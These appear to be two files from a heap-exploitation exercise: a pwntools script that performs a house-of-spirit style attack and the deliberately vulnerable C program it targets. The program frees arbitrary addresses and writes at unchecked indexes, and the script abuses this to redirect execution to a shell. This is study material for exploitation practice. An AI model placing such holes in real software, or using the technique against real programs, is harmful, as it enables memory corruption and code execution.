File: System/heap_allocator/spirit2.py
from pwn import *

p = process("./spirit2")
e = ELF("./spirit2")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def add(size):
    p.sendlineafter(b">", b"1")
    p.sendlineafter(b"Size: ", str(size).encode())

def delete(addr):
    p.sendlineafter(b">", b"2")
    p.sendlineafter(b"Address: ", str(addr).encode())

def edit(idx, data):
    p.sendlineafter(b">", b"3")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.send(data)

def getshell():
    p.sendlineafter(b">", b"4")
    p.interactive()

# ptr_size : rbp-0x60, size : rbp-0xc8, ptr : rbp-0xb0

ptr_size = int(p.recvline()[:-1], 16) + 0x78

add(0)          # 0
add(0x90)       # 1
delete(ptr_size)

add(0x80)       # 2
edit(2, p64(ptr_size+0x58))

edit(12, p64(0x40069e)+p64(e.symbols["giveshell"]))

getshell()

File: System/heap_allocator/spirit2.c
// gcc -o spirit2 spirit2.c -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void giveshell()
{
	system("/bin/sh");
}
int main()
{
	setvbuf(stdin,0,2,0);
	setvbuf(stdout,0,2,0);
	
	char *ptr[10] = {0,};
	
	long long idx = 0;
	size_t size = 0;
	long long index = 0;
	size_t address = 0;
	int i = 0;
	size_t *ptr_size[10] = {0,};
	
	printf("%p\n", &size);
	while(1) {
		printf("1. Add\n");
		printf("2. Free\n");
		printf("3. Edit\n");
		printf(">");
		scanf("%d",&idx);
		switch(idx) {
			case 1:
				if( i >= 10 ) {
					break;
				}
				printf("Size: ");
				scanf("%llu",&size);
				ptr[i] = malloc(size);
				ptr_size[i] = size;
				i++;
				break;
			case 2:
				printf("Address: ");
				scanf("%lld", &address);
				free(address);
				break;
			case 3:
				printf("Index: ");
				scanf("%llu", &index);
				read(0, ptr[index], ptr_size[index]);
				break;
			default:
				return 0;
		}
	}
	
	
	return 0;
}
